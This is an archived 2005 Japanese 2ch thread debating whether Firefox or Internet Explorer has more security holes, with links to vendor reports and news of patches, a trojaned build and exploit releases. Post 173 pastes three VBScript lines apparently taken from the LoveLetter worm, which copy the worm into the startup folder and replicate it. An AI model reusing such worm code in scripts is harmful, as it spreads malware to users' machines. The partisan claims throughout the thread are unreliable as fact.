【Firefox】IEより多かったセキュリティ脆弱性

[表示 : 全て最新50 1-99 101- 201- 301- 2chのread.cgiへ]
Update time : 05/09 12:36 / Filesize : 88 KB / Number-of Response : 318
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/08/13(土) 18:01:31 ID:iWBNLj7J0]: Recently Symantec, the anti-virus security company, released a security report and in that report they pointed out that according to their test IE's
render engine is much more secure than the Firefox render engine.

最近、Symantec(アンチウイルス警備会社)はセキュリティレポートを発表しました。そして、そのレポートでは、
Microsoft Internet Explorerのエンジンでレンタリングする方が　Firefoxのエンジンを使ってレンダリングするよりはるかに安全だと指摘しました。
www.bbcworld.com/content/template_clickonline.asp?pageid=665&co_pageid=2

Mozilla 製品には Internet Explorer よりもより多くのセキュリティ脆弱性があると報じられたのは、これが初めてではない。
3月には Symantec が Internet Security Threat Report Volume VII 【訳注：インターネットのセキュリティへの脅威関する報告 VII】を公開し、
2004年後半の状況を報告している。同報告は次のように述べている。「ブラウザに影響する脆弱性の発見は増加傾向にあり、この期間に報告された
Mozilla の脆弱性は Microsoft Internet Explorer の脆弱性よりも多い ... 2004年 7月 1日から 12月 31日までの間、
Symantec は Microsoft Internet Explorer に影響する脆弱性を 13 件報告しているが、この件数は、同期間中に Mozilla 製品で報告された 21 件と比較して、
明らかに少ない。Opera では 6 権の脆弱性が報告されており、Safari では報告されていない。」
slashdot.jp/journal.pl?op=display&uid=12840&id=310454
75 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/08(木) 05:13:53 ID:CGCwbBq+0]: ｲﾀｲ布教ｽﾚはここですかw
76 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/08(木) 05:33:06 ID:QiUSYg/E0]: >>74
>Mozilla の脆弱性は Microsoft Internet Explorer の脆弱性よりも多い
＞ただし危険性の高い脆弱性に関しては、やはり Internet Explorer が大きな比率を占めています。
77 名前：名無しさん＠お腹いっぱい。 [2005/09/08(木) 08:52:36 ID:7i04fuDJ0]: >>75はｲﾀｲ火狐信者
78 名前：終わったな [2005/09/10(土) 09:15:21 ID:uFgXuSit0]: ITmedia エンタープライズ：Firefoxに極めて重大な脆弱性
www.itmedia.co.jp/enterprise/articles/0509/10/news006.html
79 名前：名無しさん＠そうだ選挙に行こう [2005/09/10(土) 20:50:12 ID:ANTWE8TJ0]: >>78
80 名前：名無しさん＠そうだ選挙に行こう [2005/09/10(土) 22:56:27 ID:h+6zGum50]: 最近変な動作が多いと思ったら、これが原因か。
こんな事なら、IEから乗り換えるんじゃなかった・・・

こんな無責任なブラウザ、もう二度と使わない。
81 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2005/09/10(土) 23:21:23 ID:FGo68clT0]: ↑三重三重すぎてﾜﾛｽｗ
82 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2005/09/11(日) 12:24:28 ID:+x3JCzpA0]: きじゃくせいがあぶないんですよ！！
83 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2005/09/11(日) 14:27:03 ID:KNjr+KSN0]: 自分がＩＥを捨てたのはうｐdateの時に関係ないウインドウズ内部の設定まで勝手に
変えられてしまうことがとてもウザかったから。いちいち探して元に戻すのめんどくせー
べつにfoxじゃなくてもいいんだけど。
84 名前：名無しさん＠そうだ選挙に行こう [2005/09/11(日) 20:21:23 ID:tsvBPmBE0]: tst
85 名前：名無しさん＠そうだ選挙に行こう mailto:sage [2005/09/11(日) 22:18:54 ID:Afkb25s90]: 似たようなｽﾚばっかり。いつまでやってんの、馬鹿じゃんｗ
86 名前：名無しさん＠お腹いっぱい。 [2005/09/12(月) 05:37:41 ID:EnZKS8gQ0]: 国際化ドメイン名 (IDN) サポート関する潜在的に重大なセキュリティ脆弱性
ttp://www.mozilla-japan.org/security/idn.html
パッチ出てるぞ
87 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/12(月) 19:19:25 ID:VdpiUOLG0]: こんなスレまで貼りに来るとは、ご苦労さま
88 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/12(月) 20:25:42 ID:6HPZHAnp0]: きっと新しい人が次々入れ変わって同じような話してるんだよｗ
89 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/13(火) 02:18:22 ID:0Jvvj4o10]: 別にパッチなんて当てなくても手動で即変更出来るぞ新Ver出るまでそれで対応
90 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/13(火) 08:56:46 ID:H7NqZcho0]: まだ日本では使用者が少ないだけ救いだよ
世界中に大騒ぎする醜態を晒さずに済むんだからな
91 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/19(月) 17:51:01 ID:ikINWNBv0]: www.eeye.com/html/research/upcoming/index.html
Firefoxは0day攻撃を考慮したセキュリティFixをしているのにIEはこんなにあるよ。大変ですね＾＾
92 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/19(月) 20:16:35 ID:3Ue/Qh5T0]: FirefoxもXPConnect特権を不正に取得できてしまう脆弱性を1.0.6になるまで長い間放置していたからなあ・・・・・
Mozillaはまだ放置・・・・・・
93 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/19(月) 23:23:25 ID:Y6/EeQU20]: ヒント：Seamonkey1.0a。
ヒント2：Firefoxは1.0.6で解決済。
ヒント3：IEは未だに13もの脆弱性を放置。
IE儲 m9（^Д^）ﾌﾟｷﾞｬー
94 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/20(火) 21:17:49 ID:YbotFLsc0]: >ヒント3：IEは未だに13もの脆弱性を放置。
18じゃ？
95 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/22(木) 01:32:28 ID:Z5Ngx6fn0]: IEもFireFoxも、JavaScriptやActiveXをONにしてたら危険なのは一緒。
だからどちらを使うにしても、必要に応じてON/OFFするのが好ましい。
だったらわざわざFireFox入れるより、コンポーネントブラウザ使ってた方が
スマートではなかろうか?
（コンポーネントブラウザの方がその辺充実しているし…）

…と思う漏れは、間違ってるだろうか。
96 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/22(木) 04:24:19 ID:R4QU3Vdv0]: >>95
全くその通り

ただIEだが過去に切ったつもりでもイントラネットゾーンとして認識して
イントラネットで許可していると実行されるMS01-010というの脆弱もあった
ふしあなさんトラップというのもありましたなあ

だからIEは今一つ使う気がしないのよ
97 名前：名無しさん＠お腹いっぱい。 [2005/09/23(金) 02:18:06 ID:vLpy4miJ0]: Firefox 1.0系はタブを閉じてもメモリを解放できてなかったそうだ。
まじで糞フトだな。
ttp://andore.com/inami/mtarchives/003249.html
98 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/23(金) 11:45:44 ID:2B2RKyy5O]: そこでOperaですよ
99 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/23(金) 19:39:27 ID:1nd1OXcE0]: >>97　なぜこのスレに……
100 名前：名無しさん＠お腹いっぱい。 [2005/09/23(金) 20:43:42 ID:vLpy4miJ0]: ﾌﾟﾆﾙの方が好きだ。
Firefoxを使い始める前から使っていたんで。
101 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/23(金) 20:53:08 ID:kKG3kEBN0]: それIE
102 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/23(金) 21:37:19 ID:QgFQ1jK10]: タブとスキンのデザインならFirefoxだな
ＩＥはアイコンのデザインが好きになれない
103 名前：名無しさん＠お腹いっぱい。 [2005/09/23(金) 21:49:30 ID:aolFdLWIO]: ただ他の人と違う奴を使いたいだけじゃない?
104 名前：名無しさん＠お腹いっぱい。 [2005/09/23(金) 23:17:55 ID:fjV0URkN0]: てゆーか、タブを右クリックして一番上に出るのは”閉じる”にしる！
って、何処に言えばいい？
105 名前：名無しさん＠お腹いっぱい。 [2005/09/23(金) 23:22:25 ID:aolFdLWIO]: 開発元
106 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/23(金) 23:24:28 ID:432+yH/F0]: そういった細かいところに配慮が欠けている。
107 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 00:11:20 ID:JKbW/6bF0]: 中クリック一発でタブ閉じるようにしてるから気付かんかった
108 名前：名無しさん＠お腹いっぱい。 [2005/09/24(土) 04:33:11 ID:vsQVP3cO0]: 1.0.7来たね
109 名前：名無しさん＠お腹いっぱい。 [2005/09/24(土) 10:29:17 ID:7Ebz4Vfz0]: ＞タブを右クリックして一番上に出るのは”閉じる”にしる！

これは投入されてる？
110 名前：名無しさん＠お腹いっぱい。 [2005/09/24(土) 14:41:29 ID:ZuUO2Q160]: オペラの逆襲が始まったし、どうなることやら。
でもオペラごてごてしすぎ。
一般の支持も受けたいなら、シンプルにしなきゃ。
111 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 14:55:40 ID:plI4QWGe0]: >>110
確かにそうかもしれない。
Operaは設定UIで設定できない部分が結構あるし、ini弄れってのはかわいそうかも。
「初期の狐は何も付いてないから必要な拡張を2,3個入れたい」
そんな人には狐の方がシンプルに感じるだろう。
でも正直、IEに警戒感を覚えるような奴らが拡張2,3個で済ますわけねーんだよなｗ
シンプルってのなら、今、作成中のBegelがよさげかな。
まだまだ未完成だけどDonutっぽくてしれらより取っ付きやすい。
期待してるとこなんだが・・・完成するかなぁ？
112 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 15:03:52 ID:JKbW/6bF0]: 俺はTabMixとChatzillaしか入ってないけどな
113 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 15:07:50 ID:QS0blr2v0]: オレはsageと翻訳パネルとAll-in-oneジェスチャーとscrapbookとminiT+とDownload Statusbarしか入ってないけどな
114 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 15:24:24 ID:GgCxhSVb0]: Begel良さ気って、だったらDonutでいいんじゃないの？
Geckoってそんなに良いの？
115 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 17:40:42 ID:plI4QWGe0]: >>112
うはｗそういう人もいるんだな。
ってかChatzillaってIRCの拡張だよな？
その拡張だけでFxﾌﾞﾗｳｻﾞをメインとして使ってるの？

>>113
たぶん君は着実に拡張が増えてくと思うｗｗｗｗ

>>114
話の流れとしてシンプルなﾌﾞﾗｳｻﾞ。
んでOpera・Fxに変わるものってことでIEｺﾝﾎﾟｰﾈﾝﾄを外してみただけです。
Donutは餡の作者が帰ってきたらしいし楽しみですな。
116 名前：112 mailto:sage [2005/09/24(土) 17:44:23 ID:JKbW/6bF0]: >>115
そう。
素のFirefoxはタブブラウザのくせに新しいウィンドウをバンバン開くからTabMixで黙らせた。
RSSリーダ入れようと思ったけどいいのが無かったんでMirandaで拾ってる。
117 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 21:44:36 ID:qCy15ixo0]: 別ブラウザの話（事実と異なる）をしている人が、
「Firefox　IEより多かったセキュリティ脆弱性」というスレッドに沸いているのがちと不思議
118 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/24(土) 22:21:40 ID:plI4QWGe0]: >>116
RSSをMirandaで拾うって・・
知らんソフトだったからググって見たけどそんな用途に使えるとは。すげーなｗ

>>117
別ﾌﾞﾗｳｻﾞの話して悪かった。
でも事実と異なることは話してないと思うぞ。
例えばどのへん？
119 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/25(日) 04:28:57 ID:Zwu1xzPH0]: >>118
オレも的外れなことを書いていると分かったけど、スレちがいだからレスを我慢したクチだよ。
そういう話題はよそへ移動した方がよいと思う。
火狐愛好者が便乗してきて、話題をほかのブラウザに変えるのも心配だしね。
120 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/25(日) 04:54:29 ID:lMdliH7p0]: >>119
君がっかりスレにもいなかったっけ？
121 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/25(日) 04:59:29 ID:Zwu1xzPH0]: >>120
おらん。
122 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/26(月) 09:31:12 ID:MNfm2REa0]: Firefoxのセキュリティ・ホールを突く危険なコードが出回る

米SANS Instituteなどは米国時間9月23日，Firefoxなどに見つかった
セキュリティ・ホール「IDNバッファオーバーフロー問題」を突くコード（プログラム）が
ネット上で公開されているとして注意を呼びかけた。そのコードが含まれるページを
Firefoxで閲覧すると，リモートからアクセス可能なシェルが起動され，
攻撃者にパソコンを乗っ取られる可能性がある。

itpro.nikkeibp.co.jp/article/NEWS/20050924/221614/
123 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/26(月) 18:08:43 ID:a6bnxBsV0]: Firefoxのセキュリティ・ホールを突く危険なコードが出回る
itpro.nikkeibp.co.jp/article/NEWS/20050924/221614/

米SANS Instituteなどは米国時間9月23日，Firefoxなどに見つかった
セキュリティ・ホール「IDNバッファオーバーフロー問題」を突くコード（プログラム）が
ネット上で公開されているとして注意を呼びかけた。そのコードが含まれるページを
Firefoxで閲覧すると，リモートからアクセス可能なシェルが起動され，
攻撃者にパソコンを乗っ取られる可能性がある。
9月23日に日本語版が公開されたFirefox 1.0.7ではこのセキュリティ・ホールは解消されている

>>122
引用するならちゃんと1.0.7でパッチ当たってるとこまで引用しなよｗ
124 名前：名無しさん＠お腹いっぱい。 [2005/09/27(火) 01:04:54 ID:s2h1V+nW0]: トロイに感染したMozillaとThunderbirdがMozillaの公式FTPサイトにアップ
ttp://internet.watch.impress.co.jp/cda/news/2005/09/26/9248.html
工工エエェェ（´Д｀）ェェエエ工工

インストールするだけでスリルとサスペンスが味わえる素敵なブラウザ　Firefox
インストールするだけでスリルとサスペンスが味わえる素敵なブラウザ　Firefox
インストールするだけでスリルとサスペンスが味わえる素敵なブラウザ　Firefox　
125 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/27(火) 01:19:07 ID:opYn+JI80]: >>124
なぜ「韓国語版」というとこを引用しませんか
126 名前：名無しさん＠お腹いっぱい。 [2005/09/27(火) 02:27:10 ID:nsLh+TDK0]: 火狐ズタボロ
ﾃﾗｶﾜｲｿｽ
127 名前：名無しさん＠お腹いっぱい。 [2005/09/27(火) 04:26:14 ID:deFs5FiD0]: >>122や>>124 のように自分の都合の悪い部分を引用しない
不公正な記事紹介者に惑わされてはいけません。正しい知識を身につけるには自分で調べることが大切です。

Google 検索　"脆弱性　IE　Firefox"
www.google.co.jp/search?q=%90%C6%8E%E3%90%AB%81%40IE%81%40Firefox&ie=Shift_JIS&num=20&hl=ja&lr=lang_ja&btnG=Google+%8C%9F%8D%F5

Google News 検索　"脆弱性　IE　Firefox"
news.google.co.jp/news?q=%E8%84%86%E5%BC%B1%E6%80%A7%E3%80%80IE%E3%80%80Firefox&num=20&hl=ja&lr=lang_ja&inlang=ja&sa=N&tab=wn
128 名前：名無しさん＠お腹いっぱい。 [2005/09/27(火) 05:27:07 ID:M1jFvEgd0]: >>122や>>124の元記事を読みましたが、事実を歪曲した変な記事ではなかったです。
公式サイトに韓国版がアップされたということは、日本語版でも同様の事件が起きる可能性があったと感じます。
>>122の記事も最新版へ版を上げるのが半日でも遅ければ、被害を受けてしまう可能性が示唆されている緊迫感が溢れた内容でした。
漏れの胸には、>>122や>>124の元記事がズンと響きました。(｀Д´；)
129 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/27(火) 08:04:46 ID:k4CB8WNT0]: 使わなきゃいいだろ
130 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/27(火) 10:25:51 ID:cIuQPL1X0]: やっぱりIEが一番安全だね。
MS謹製は伊達じゃないね。
131 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/27(火) 20:16:28 ID:/uGK3lAg0]: GNUかどっかのFTPも一時期ハックされたよな
132 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/28(水) 23:46:38 ID:CdgqJAxR0]: >>128
どこからどこが同様な事件なのか謎だな。モジラコリアと別組織のMozilla Japanで同じことが
起きる可能性なら、別のオープンソース系のプロジェクトも同じくらいだろうし。
まあ汚染されたローカライズ版がローカライズ元のヘマでMozilla.orgのFTPにあがる危険性も
今回の失敗を反省せずにケンチャナヨな仕事しないかぎりローカライズ版も安心だろう。
そもそもローカライズ版なんて公式に置いてあろうがその言葉使う人間しか使わないもんだしな。

個人的にはハングル版は使う予定はないし、MozillaJapanが信用できないようなら
次のブラウザ決めるまではそういう事が起きる可能性の低い英語版使うだろうな。

怖いなら他のブラウザに乗り換えればいいんだよな、幸い火狐も雷鳥も人に勧めた事もないし・・・
133 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/29(木) 02:01:03 ID:lKrqHRhw0]: 勝手につけられた「公式」という言葉に惑わされている人間がいるな
自分でよく情報を精査してみたら？

あと、オープンソースVSマイクロソフトという図式を
意図的に作り出そうとしている人間もいるから要注意。

MSNのサイトだって凶悪なウイルスをばら撒いていたこともあることだし
134 名前：名無しさん＠お腹いっぱい。 [2005/09/29(木) 22:07:46 ID:28f7dZxc0]: ttp://internet.watch.impress.co.jp/cda/news/2005/09/29/9294.html
Geckoエンジンに由来する脆弱性、Lunascapeにも影響

ほかの製品の足まで引っ張ってるんだな（汗
しょうもない。
135 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/29(木) 23:17:40 ID:sodlPqrm0]: マルチエンジンだとそれぞれのエンジンの脆弱性というリスクを背負ってるからな。
136 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/09/30(金) 21:28:48 ID:aoJUMEOC0]: それこそIEだとほぼ全滅だろうが（ﾜﾗ
137 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/01(土) 10:38:30 ID:TeRyCRtr0]: Gecko外せば良い話だ＞Luna
すぐ外せ
138 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/01(土) 12:51:34 ID:0pB875gi0]: >>135
作者さんのリスクは増えるけどユーザのリスクは減ってる罠。
139 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/03(月) 16:14:41 ID:KyL+RY7o0]: 報告された弱点と実際のセキュリティはFirefoxの優位性を示している
www.itmedia.co.jp/enterprise/articles/0509/26/news027.html

106ページから成るSymantecのリポートでは、ブラウザの弱点についての記述は僅かな部分を占めているにすぎない。
しかし、業界紙はFirefoxの弱点がIEよりも多いというニュースを大きく取り上げていた。

Firefoxのほうが「報告された」弱点は多いかもしれないが、実際のエクスプロイトを見つけるのは難しい。
Mozillaプロジェクトの製品ヘッドを務めるクリス・バード（Chris Beard）氏は、Firefoxの弱点に対して実際に攻撃があったという話は聞いていないと言った。
140 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 00:46:19 ID:xKhAwCWo0]: ttp://japan.cnet.com/news/sec/story/0,2000050480,20085483,00.htm
またFirefoxのプロモーションサイト侵入事件　ユーザー10万人の個人情報流失の可能性

Firefoxは何から何までクソだな
141 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 01:58:41 ID:SHwKQQlj0]: 最近変な動作が多いと思ったら、これが原因か。
こんな事なら、IEから乗り換えるんじゃなかった・・・

こんな無責任なブラウザ、もう二度と使わない。
142 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 03:56:23 ID:qkQVgx2n0]: そう？俺は逆でIEの頃はバンバンブラクラやスパイウェア喰らいまくり、
その他原因不明のエラーで落ちまくったけど、Firefoxにしてからはそんなことは一度もなくなったよ。
別世界のように安定してる。もっと早く決断しとくべきだったよ。

それに、すぐにFirefoxに責任転嫁するのはちょっと時期尚早じゃないんかい？
ちゃんと検証してからじゃないと逆に問題解決が遠くなるよ。スパイウェアやウィルスの働きかもしれないし。
特にIEの人は知らないうちにスパイウェアやウィルス喰らっててそういうのが多いんだよね。一度ちゃんと調べてもらうことをおすすめするよ。
143 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/07(金) 09:03:37 ID:SgY26LkG0]: >>141
>>140で書いてある情報の流出はFirfoxの動作と関係ないと思うぞ。
144 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/07(金) 09:05:03 ID:SgY26LkG0]: まちがった。orz
×Firfox
○Firefox
145 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 13:59:36 ID:F7fGvN3p0]: 正直、個人情報一切持ってない俺には脆弱性なんてどうでもいい
146 名前：名無しさん＠お腹いっぱい。 [2005/10/07(金) 14:03:24 ID:6nZKQfvl0]: IP自体立派な個人情報
147 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/07(金) 22:59:25 ID:Y4/nGif40]: ああそう
148 名前：名無しさん＠お腹いっぱい。 [2005/10/12(水) 00:39:13 ID:jHMQxzfP0]: Firefox 1.0.7でリモートから攻撃可能なスタックオーバーフローが見つかる
ttps://www.netsecurity.ne.jp/1_4621.html

また糞foxのでかいセキュ穴・・・・。Linux使いなんでクマったよ。('A`)
149 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/12(水) 01:10:02 ID:UhKZX0zs0]: ＞IP自体立派な個人情報
IPは全世界共通のプロトコルです。
IPアドレスは利用者の氏名、住所、その他の個人情報を特定するものではありません。
つまり個人情報ではありません（個人情報保護法より）

結論だけ言うとｱﾎかと。
150 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/12(水) 01:40:25 ID:tuzXIcIz0]: GATEKEEPERにとっては困ることだ
151 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/12(水) 15:08:18 ID:Ucs66PI80]: どうでもいいよ
152 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/12(水) 20:55:31 ID:JyuiqZsS0]: >>149
他のデータと照合することにより個人を特定できる場合は
個人情報として認められるんじゃなかったか
153 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/13(木) 00:22:56 ID:nmeBryoK0]: IPアドレス（とその接続時刻）から個人を割り出せるのって基本的にISPだけじゃないの？
154 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/13(木) 04:43:57 ID:OkmmlNcx0]: SMTP over SSL でヘッダーに付くIPアドレスから
引き篭ってることがバレる。Webメールを使おう。
155 名前：名無しさん＠お腹いっぱい。 [2005/10/14(金) 16:25:20 ID:EeTPCnwU0]: 脆弱性とかどうでもいい
昔は脆弱性ぐらいでスレ乱立しなかったし
156 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/14(金) 22:35:00 ID:5mcfrceg0]: どうでも良いとはいわないけど、本気で脆弱性を気にしだしたらWindows使うなってことになりかねない。
じゃあ、何を気にすればいいんだっていったら、速やかにパッチされるかどうかってことじゃない？

一番困るのは放置プレイ。
157 名前：名無しさん＠お腹いっぱい。 [2005/10/17(月) 19:06:38 ID:CKId7XO40]: pc8.2ch.net/test/read.cgi/sec/1127257870/732-797

797 名前：名無しさん＠お腹いっぱい。[] 投稿日：2005/10/17(月) 18:58:02
>>792
つまりFirefoxが糞ということでFAなw
158 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/17(月) 19:30:05 ID:DN35F2g10]: >>157
IEと互換性を高めるためにFxは
www.rakuiti.com/favicon.ico
を呼びにいってるけどそのファイルがhtmlだからNOD32さんが誤検出してるだけっぽい。(どの時点で検出してるか知らないけど。ディスクキャッシュ辺り?)
IEはリダイレクト時は/favicon.icoを呼びにいかない仕様なのかな?(それともMOD32がfaviconを取得できてないのか)
#セキュリティ板ってレヴェル低いなw
159 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/17(月) 19:36:15 ID:0eAiplk60]: セキュ板より通信技術板のほうがいい
160 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/17(月) 22:40:18 ID:uusxxYP90]: >>158
MOD32 の検索結果約 11,700 件中 1 - 50 件目 (0.31 秒)
161 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 06:30:47 ID:xjmjx5C20]: IEだったらいまごろどんだけウィルスかかってたか
162 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 06:39:38 ID:xjmjx5C20]: まぁ自身は火狐使ってなくてスレイプニルだけど・・
他のブラウザの存在しってたらIEなんか使わないだろ
というかIE開こうとしてもなんかのエラーで開かないよ　プニルも火狐も使えるのに
糞ウィンドウズが壊れてきたのかな
163 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 06:42:06 ID:xjmjx5C20]: IEはウィンドウズの一部だからな・・・欠陥OS　XP・・・
データ退避させないといけないのか、メンドいな
164 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 07:06:32 ID:wIuHDK4u0]: またなんか公開されてるみたいだな
165 名前：名無しさん＠お腹いっぱい。 [2005/10/18(火) 13:54:07 ID:K/eKfqzB0]: Mozilla Firefoxブラウザの致命的でないバグを利用して、サービス停止（DoS）攻撃を
引き起こすことができると、Whitedust Securityが指摘している。

同サイトはこの主張を証明するための脆弱性実証コードと単純なテストリンクを公開した。
ttp://www.itmedia.co.jp/enterprise/articles/0510/18/news018.html
このコードが利用するバグはMozillaにとって既知のものだ。これは8月からMozillaの
バグトラッキングシステムである「Bugzilla」に掲載されていた。

このBugzilla Bug 303433は初めsecurity-protocols.comのトム・フェリス氏が報告し、
「この不正な形式の.htmlページでFirefox 1.0.6のsegfaultsが起きる」というタイトルが付けられている。
セキュリティ企業Secuniaは10月10日にこのバグに関するアドバイザリを掲載し、
「Mozilla Firefox IframeサイズのDoSの脆弱性」という題と「Not critical（致命的でない）」という評価を付けている。

「ブラウザを繰り返しクラッシュさせられるというのは致命的なバグではないかもしれないが、
もっと時間があればDoS攻撃を利用してより深刻な攻撃を仕掛けられる可能性がある」と
Whitedustのマーク・アンダーソン氏。

「定義に従えば、このバグは明らかにDoSだ。ブラウザをクラッシュさせることで、
このバグはユーザーの閲覧行為を中断させ、実質的にはすべてのアクティブなセッションを破壊して、
サービスを停止する」（同氏）
166 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 16:10:20 ID:wF9ubEvV0]: >>165
それいうんだったらcssがらみでもっとクラッシュバグがいっぱいあったはず。
それよりも<img src="mailto:">をどうにかして欲しい。
167 名前：名無しさん＠お腹いっぱい。 [2005/10/18(火) 18:34:00 ID:FzjzmHXj0]: >>158

>それともNOD32がfaviconを取得できてないのか
IEは「お気に入り」登録する時にfavicon取得する仕様だからな。
おまえってレヴェル低いなw
168 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:29:18 ID:wF9ubEvV0]: >>167
Windows環境ないんで。
どっちにせよFxではdataスキーマでhtmlファイルに埋め込まれるから安全。
169 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:29:36 ID:FqqHA8U60]: >>162
IEの脆弱性はIEコンポ使ってるブラウザにも波及するわけだが
170 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:45:47 ID:JZAhOkEt0]: javascriptとかcookieとかを簡単に切れる分、生IEよりはましじゃん。
まあLynxを使ってる俺には関係ない話だが。
171 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 20:46:55 ID:JZAhOkEt0]: やった、IDがAhOだｗ
172 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/18(火) 21:07:45 ID:FzjzmHXj0]: >>171
オメ!w

ついでに賛美しといてやるw

>>171の Σ^)/アホーアホー☆ミ
173 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/19(水) 01:19:48 ID:Da9E51cb0]: fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
174 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/19(水) 18:36:56 ID:ZlOmEkpw0]: ブラウザならW3Cオススメの Amaya を使ってみれ。
ttp://www.w3.org/Amaya/
175 名前：名無しさん＠お腹いっぱい。 mailto:sage [2005/10/19(水) 21:40:54 ID:yF+pppXI0]: >>174
日本語対応?

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef